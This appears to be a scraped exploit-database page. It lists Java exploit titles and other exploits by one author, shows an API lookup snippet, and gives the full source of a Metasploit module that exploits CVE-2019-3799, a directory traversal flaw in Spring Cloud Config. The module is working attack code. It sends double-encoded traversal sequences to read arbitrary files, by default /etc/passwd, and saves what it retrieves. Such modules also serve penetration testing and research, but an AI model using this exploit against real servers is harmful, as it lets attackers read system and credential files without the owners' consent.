Menu

Improved exploit search engine. Try it out

"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)"

Author

"Dhiraj Mishra"

Platform

java

Release date

2019-04-30

Release Date Title Type Platform Author
2019-07-12 "Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2019-07-12 "Sahi Pro 8.0.0 - Remote Command Execution" webapps java AkkuS
2019-06-17 "Spring Security OAuth - Open Redirector" webapps java Riemann
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting" webapps java Vingroup
2019-06-04 "Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting" webapps java Vingroup
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-21 "Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution" webapps java "Jakub Palaczynski"
2019-05-21 "Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection" webapps java omurugur
2019-04-30 "Spring Cloud Config 2.1.x - Path Traversal (Metasploit)" webapps java "Dhiraj Mishra"
2019-04-26 "Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting" webapps java "Dhiraj Mishra"
2019-04-08 "ManageEngine ServiceDesk Plus 9.3 - User Enumeration" webapps java "Alexander Bluestein"
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2016-12-20 "Java Debug Wire Protocol (JDWP) - Remote Code Execution" remote java IOactive
2019-02-25 "Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution" webapps java wetw0rk
2019-02-19 "Jenkins - Remote Code Execution" webapps java orange
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour" dos java "Google Security Research"
2019-02-05 "OpenMRS Platform < 2.24.0 - Insecure Object Deserialization" webapps java "Bishop Fox"
2019-01-28 "Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2018-11-30 "Apache Spark - Unauthenticated Command Execution (Metasploit)" remote java Metasploit
2018-11-14 "Atlassian Jira - Authenticated Upload Code Execution (Metasploit)" remote java Metasploit
2018-10-24 "Apache OFBiz 16.11.04 - XML External Entity Injection" webapps java "Jamie Parfet"
2018-10-22 "Oracle Siebel CRM 8.1.1 - CSV Injection" webapps java "Sarath Nair"
2018-10-01 "ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-10-01 "H2 Database 1.4.196 - Remote Code Execution" webapps java h4ckNinja
2018-09-27 "ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
Release Date Title Type Platform Author
2019-06-06 "Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion" webapps hardware "Dhiraj Mishra"
2019-05-27 "Typora 0.9.9.24.6 - Directory Traversal" remote macos "Dhiraj Mishra"
2019-04-30 "Spring Cloud Config 2.1.x - Path Traversal (Metasploit)" webapps java "Dhiraj Mishra"
2019-04-26 "Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting" webapps java "Dhiraj Mishra"
2019-04-18 "Evernote 7.9 - Code Execution via Path Traversal" local macos "Dhiraj Mishra"
2019-02-28 "WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service" dos linux "Dhiraj Mishra"
2019-01-21 "GattLib 0.2 - Stack Buffer Overflow" remote linux "Dhiraj Mishra"
2018-11-06 "libiec61850 1.3 - Stack Based Buffer Overflow" local linux "Dhiraj Mishra"
2018-08-14 "Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)" webapps linux "Dhiraj Mishra"
2018-08-14 "cgit 1.2.1 - Directory Traversal (Metasploit)" webapps linux "Dhiraj Mishra"
2018-04-05 "WebRTC - Private IP Leakage (Metasploit)" webapps multiple "Dhiraj Mishra"
2017-08-30 "Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery" webapps ruby "Dhiraj Mishra"
2017-08-09 "Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery" webapps multiple "Dhiraj Mishra"
2017-12-20 "Samsung Internet Browser - SOP Bypass (Metasploit)" remote android "Dhiraj Mishra"
2018-06-05 "WebKitGTK+ < 2.21.3 - Crash (PoC)" local linux "Dhiraj Mishra"
2018-08-23 "Epiphany Web Browser 3.28.1 - Denial of Service (PoC)" dos linux "Dhiraj Mishra"
2018-06-11 "WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)" dos linux "Dhiraj Mishra"
2018-06-01 "Epiphany 3.28.2.1 - Denial of Service" dos multiple "Dhiraj Mishra"
2017-08-31 "IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)" dos multiple "Dhiraj Mishra"
2017-09-02 "IBM Notes 8.5.x/9.0.x - Denial of Service" dos multiple "Dhiraj Mishra"
2017-08-31 "IBM Notes 8.5.x/9.0.x - Denial of Service (2)" dos multiple "Dhiraj Mishra"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46772/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46772/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46772/41216/spring-cloud-config-21x-path-traversal-metasploit/download/", "exploit_id": "46772", "exploit_description": "\"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)\"", "exploit_date": "2019-04-30", "exploit_author": "\"Dhiraj Mishra\"", "exploit_type": "webapps", "exploit_platform": "java", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Spring Cloud Config Server Directory Traversal',
      'Description' => %q{
        This module exploits an unauthenticated directory traversal
vulnerability
        which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,
        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
Spring
        Cloud Config listens by default on port 8888.
      },
      'References'  =>
        [
          ['CVE', '2019-3799'],
          ['URL', 'https://pivotal.io/security/cve-2019-3799']
        ],
      'Author'      =>
        [
          'Vern', # Vulnerability discovery
          'Dhiraj Mishra' # Metasploit module
        ],
      'DisclosureDate' => '2019-04-17',
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(8888),
        OptString.new('FILEPATH', [true, "The path to the file to read",
'/etc/passwd']),
        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
      ])
  end

  def data
    Rex::Text.rand_text_alpha(3..8)
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
    uri = "/#{data}/#{data}/master/#{traversal}"

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => uri
    })

    unless res && res.code == 200
      print_error('Nothing was downloaded')
      return
    end

    vprint_good("#{peer} - #{res.body}")
    path = store_loot(
      'springcloud.traversal',
      'text/plain',
      ip,
      res.body,
      filename
    )
    print_good("File saved in: #{path}")
  end
end